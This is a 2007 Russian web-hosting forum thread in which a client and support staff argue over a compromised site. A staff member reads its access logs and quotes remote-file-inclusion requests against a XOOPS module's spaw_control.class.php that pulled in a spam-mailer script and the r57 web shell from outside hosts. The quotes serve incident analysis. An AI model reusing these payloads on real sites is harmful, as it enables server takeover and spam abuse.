| Предыдущая тема :: Следующая тема |
| Автор |
Сообщение |
ser_ru Member
Зарегистрирован: 06.06.2007 Сообщения: 17 Откуда: Екатеринбург
|
Добавлено: 07.06.2007 15:38 Заголовок сообщения: |
|
|
Это опять я, киддис-манагер
1. snmp - простой протокол управления сетью (В.Г.Олифер Н.А.Олифер Компьютерные сети с152) и к преобразованию mac адресов в символьные имена (канальный уровень модели OSI) никакого отношения не имеет.
2. Ради интереса мне прислали логи и уменя глупый вапрос а где в них время ?
3. От вас Al-x кстати кроме оскарблений ничего тоже не поступило.
Граждане Умные админы рекомендую вам сходить на www.bsdportal.ru - хоть познакомитесь с NIX и почитать В.Г.Олифер Н.А.Олифер Компьютерные сети . |
|
| Вернуться к началу |
|
 |
Al-x Member
Зарегистрирован: 02.06.2005 Сообщения: 33 Откуда: Санкт-Петербург
|
Добавлено: 07.06.2007 15:42 Заголовок сообщения: |
|
|
| ser_ru писал(а): | | 3. От вас Al-x кстати кроме оскарблений ничего тоже не поступило. |
зачем же так? от меня была просьба, объяснить мне не разумному, что же так на открытые порты накинулись. гляньте мой первый пост в этой теме.
кстати, у Вас не так много времени осталось, что бы доказать свою состоятельность
а вот мне, кстати, этого делать не надо, потому как я не утверждал, что знаю больше всех и что могу настроить сервера гораздо лучше, чем это сделано на выбранном мною хостинге. |
|
| Вернуться к началу |
|
 |
dimcha Core team
Зарегистрирован: 30.01.2004 Сообщения: 41
|
Добавлено: 07.06.2007 15:48 Заголовок сообщения: |
|
|
| ser_ru писал(а): | Это опять я, киддис-манагер
1. snmp - простой протокол управления сетью (В.Г.Олифер Н.А.Олифер Компьютерные сети с152) и к преобразованию mac адресов в символьные имена (канальный уровень модели OSI) никакого отношения не имеет.
2. Ради интереса мне прислали логи и уменя глупый вапрос а где в них время ?
3. От вас Al-x кстати кроме оскарблений ничего тоже не поступило.
Граждане Умные админы рекомендую вам сходить на www.bsdportal.ru - хоть познакомитесь с NIX и почитать В.Г.Олифер Н.А.Олифер Компьютерные сети . |
1. я в курсе, только как это относится к нашему хостингу? мы snmp не используем. так-же как и самбу, поэтому и написал их вместе.
2. в первом столбце - формат unixtime
$ date -r _time_
надо понимать, что Ваша придирка к snmp была последней возможностью хоть как-то сохранить хорошую мину при плохой игре?? Или еще остались вопросы по открытим портам и демонам? |
|
| Вернуться к началу |
|
 |
AP Core team
Зарегистрирован: 14.02.2005 Сообщения: 444 Откуда: LostHold
|
Добавлено: 07.06.2007 15:50 Заголовок сообщения: |
|
|
2ser_ru
Меня, честно говоря, удивляет, что unix админ не знает про unix формат времени. И вы, при этом, рекомендуете нам узнать, что же такое unix?
2Al-x
Там за пару минут можно управиться. У меня, правда, желание уже опубликовать, что и как было. |
|
| Вернуться к началу |
|
 |
Al-x Member
Зарегистрирован: 02.06.2005 Сообщения: 33 Откуда: Санкт-Петербург
|
Добавлено: 07.06.2007 16:05 Заголовок сообщения: |
|
|
| AP писал(а): | 2ser_ru
Меня, честно говоря, удивляет, что unix админ не знает про unix формат времени. И вы, при этом, рекомендуете нам узнать, что же такое unix? |
пять балов
| AP писал(а): | | 2Al-xУ меня, правда, желание уже опубликовать, что и как было. |
при всём моём уважение: договор есть договор.
дайте парню шанс  |
|
| Вернуться к началу |
|
 |
ser_ru Member
Зарегистрирован: 06.06.2007 Сообщения: 17 Откуда: Екатеринбург
|
Добавлено: 07.06.2007 16:26 Заголовок сообщения: |
|
|
Покажите очень тупому админу как перевести это в нормальное время :
18664 GET www.satur.ru /modules/news/article.php?storyid=33 - Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) -
1180728467 141.76.45.35 404 486 GET www.satur.ru //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://firp.it/mambots/editors/jce/jscripts/tiny_mce/plugins/fullscreen/images/final.txt? - Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4 -
1180728468 141.76.45.34 403
Последний раз редактировалось: ser_ru (07.06.2007 16:28), всего редактировалось 1 раз |
|
| Вернуться к началу |
|
 |
AP Core team
Зарегистрирован: 14.02.2005 Сообщения: 444 Откуда: LostHold
|
Добавлено: 07.06.2007 16:28 Заголовок сообщения: |
|
|
1180728106
ap$ date -r 1180728106
Sat Jun 2 00:01:46 MSD 2007
Кстати, логи в формате squid |
|
| Вернуться к началу |
|
 |
ser_ru Member
Зарегистрирован: 06.06.2007 Сообщения: 17 Откуда: Екатеринбург
|
Добавлено: 07.06.2007 16:31 Заголовок сообщения: |
|
|
| Скажите а как тупые люди должны понимать эти логи если незнают в чем они сгенерированы. |
|
| Вернуться к началу |
|
 |
Al-x Member
Зарегистрирован: 02.06.2005 Сообщения: 33 Откуда: Санкт-Петербург
|
Добавлено: 07.06.2007 16:32 Заголовок сообщения: |
|
|
с другой стороны, наверное будет более гуманно остановить это издевательство над
| LORD писал(а): | | P.S. А господин ser_ru вообще один из лучших админов! Его точно половина провайдеров знает! |
|
|
| Вернуться к началу |
|
 |
AP Core team
Зарегистрирован: 14.02.2005 Сообщения: 444 Откуда: LostHold
|
Добавлено: 07.06.2007 16:35 Заголовок сообщения: |
|
|
У нас на форуме и, если я не ошибаюсь, на сайте есть информация по поводу формата логов.
Последний раз редактировалось: AP (07.06.2007 16:39), всего редактировалось 1 раз |
|
| Вернуться к началу |
|
 |
ser_ru Member
Зарегистрирован: 06.06.2007 Сообщения: 17 Откуда: Екатеринбург
|
Добавлено: 07.06.2007 16:36 Заголовок сообщения: |
|
|
Не знаю как у вас на Калыме у нас логи обычно выглядит так:
Jun 5 00:00:00 www newsyslog[54384]: logfile turned over due to size>100K
Jun 5 12:26:57 www sshd[56174]: Did not receive identification string from 62.94.144.227
Jun 5 12:29:31 www sshd[56175]: Illegal user admin from 62.94.144.227
Jun 5 12:49:37 www sshd[56215]: Did not receive identification string from 70.43.174.170
Jun 5 12:52:17 www sshd[56219]: Illegal user admin from 70.43.174.170
Jun 5 12:57:30 www sshd[56238]: Did not receive identification string from 216.144.238.152
Jun 5 13:00:07 www sshd[56258]: Illegal user admin from 216.144.238.152
Jun 5 13:00:09 www sshd[56260]: Illegal user admin from 216.144.238.152 |
|
| Вернуться к началу |
|
 |
AP Core team
Зарегистрирован: 14.02.2005 Сообщения: 444 Откуда: LostHold
|
Добавлено: 07.06.2007 16:37 Заголовок сообщения: |
|
|
Я не писал о /var/log/auth или /var/log/messages.
Это хоть на колыме, хоть где угодно формат squid'а |
|
| Вернуться к началу |
|
 |
AP Core team
Зарегистрирован: 14.02.2005 Сообщения: 444 Откуда: LostHold
|
Добавлено: 07.06.2007 16:42 Заголовок сообщения: |
|
|
Кстати unix time довольно распространен, его используют многие программы на выводе. Правда, сейчас я могу вспомнить только printk в linux kernel на загрузке.
Ну, и естественно, что это внутренний формат времени, который используется программистами, imho как правило, при написании различных программ под unix. |
|
| Вернуться к началу |
|
 |
ser_ru Member
Зарегистрирован: 06.06.2007 Сообщения: 17 Откуда: Екатеринбург
|
Добавлено: 07.06.2007 16:46 Заголовок сообщения: |
|
|
| Так мы общаемся с учень умными программерами а не админами! |
|
| Вернуться к началу |
|
 |
AP Core team
Зарегистрирован: 14.02.2005 Сообщения: 444 Откуда: LostHold
|
Добавлено: 07.06.2007 16:46 Заголовок сообщения: |
|
|
Время подходит к 18.00 посему я все же напишу, что и как. Однако, должен отметить, что уважаемый ser_ru вполне справился с задачей, судя по куску лога, который он привел. Это замечательно, и было бы еще замечетельней, если бы с этого все начиналось.
Максим, наколько я вижу, вы убрали с сайта все скрипты в принципе, в том числе и уязвимые, поэтому проблем в связи с указанием мною данной уязвимости не будет:
В логах можно найти следующие строчки:
... GET http://www.satur.ru:82/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://sigmafotbal.cz/org/mailer.txt?&?=v
... POST http://www.satur.ru:82/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://sigmafotbal.cz/org/mailer.txt?&?=v -
... POST http://www.satur.ru:82/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://sigmafotbal.cz/org/mailer.txt?&?=v
Таким образом был разослан спам. У уважаемого LORD'а возник вопрос, каким именно образом взлом одного клиента может нанести ущерб другим клиентам и нам. По-моему акцент на слове спам я же делал. Неужели серьезному администратору трудно сделать соответствующие выводы из этого?
Про то, что столь массавая рассылка спам дает дополнительную нагрузку на сервер можно было бы и не говорить. Лимиты стоят, но тем не менее определенную нагрузку создать можно, учитывая, что у sendmail'а менее строгие правила по кол-ву получателей и т.д., в силу того, что он и предназначен для рассылок (нормальных, разумеется).
Второе, и пожалуй, в данном контексте самое главное. Блок-листы. По-моему сейчас все труднее находить пользователей электронной почты, которые в связи с почтовыми трудностями не слышали этого слова. Системного администратора, в общем случае, тоже. Рассылки спама, в зависимости от их "удачности", могут парализовывать различные почтовые пересылки из-за довольно быстрого попадания сервера в блок-листы. Я ответил на Ваш вопрос по поводу ущерба, г-н LORD?
И наконец, встречается такая строчка, кстати, неоднократно:
... GET http://www.satur.ru:82/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.gonfiabiligamespark.it/flash/r57.txt?
r57.txt, думаю, что LORD и ser_ru представлять не надо, но кто-то может и не знать - это тулкит, типа шелла, для выполнения различных комманд на удаленном сервере, который очень любят использовать script kiddies. То есть, с данной уязвимостью на сайте можно сделать все-что угодно. Удалить весь контент, понаставить других закладок в скрипты и прочая.
Информация о самой уязвимости, которую несложно найти, зная какую версию CMS вам поставил вебмастер:
http://www.securityfocus.com/bid/24302/info
XOOPS IContent Module Spaw_Control.Class.PHP Remote File Include Vulnerability
Возможно есть что-то еще из уявимостей, тут уже нужно просто подробнее данным вопросом поинтересоваться.
Максим, у вас есть полный лог за двое полных суток, поэтому вы можете более тщательную проверку провести. На будущее, я бы порекомендовал вам создать у себя папку logs в корне домашнего каталога ( все согласно инструкциям ), тогда при возникновении проблем у вас будут логи за целую неделю. |
|
| Вернуться к началу |
|
 |
|
|
Вы не можете начинать темы Вы не можете отвечать на сообщения Вы не можете редактировать свои сообщения Вы не можете удалять свои сообщения Вы не можете голосовать в опросах
|
|